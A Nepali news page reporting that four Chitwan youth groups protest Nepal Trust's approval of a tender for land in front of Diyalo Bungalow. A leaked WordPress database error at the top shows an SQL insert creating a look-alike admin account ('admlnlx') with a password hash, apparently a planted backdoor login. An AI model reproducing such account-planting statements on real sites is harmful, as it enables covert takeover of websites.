WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2Vjided7CuTkfwft/9knuPS3Xi/qU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 09:29:56', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २३–
दियालो बंगला अगाडिको ६ बिघा जग्गा नेपाल ट्रष्टले व्यक्तिगत प्रायोजनका लागि स्वीकृत दिएको भन्दै चितवनका चार युवा संगठतले बिरोध जनाएका छन् ।
आज एक विज्ञप्ती जारी गर्दै उनीहरुले भरतपुर उपमहानगरपालिकाले टेण्डर हाल्दा बेवास्ता गरि व्यक्तिगत प्रायोजनका लागि व्यक्तिको नाममा टेण्डर स्वीकृत गरिएको प्रति गम्भिर ध्यानाकर्षण भएको जनाएका छन् ।
नेपाल तरुण दल चितवनका अध्यक्ष राजन ताम्राकार, युवा संघ नेपाल, चितवनका संयोजक दिलिप न्यौपाने, वाईसिएल चितवनका अध्यक्ष मोदराज न्यौपाने (मधु), क्रान्तिकारी युवा लिग नेपाल चितवनकाका अध्यक्ष सरोज थापाको हस्ताक्षर रहेको विज्ञप्तीमा भरतपुर मातहतमा रहेर टेण्डर स्वीकृत गर्न माग गरेको छ ।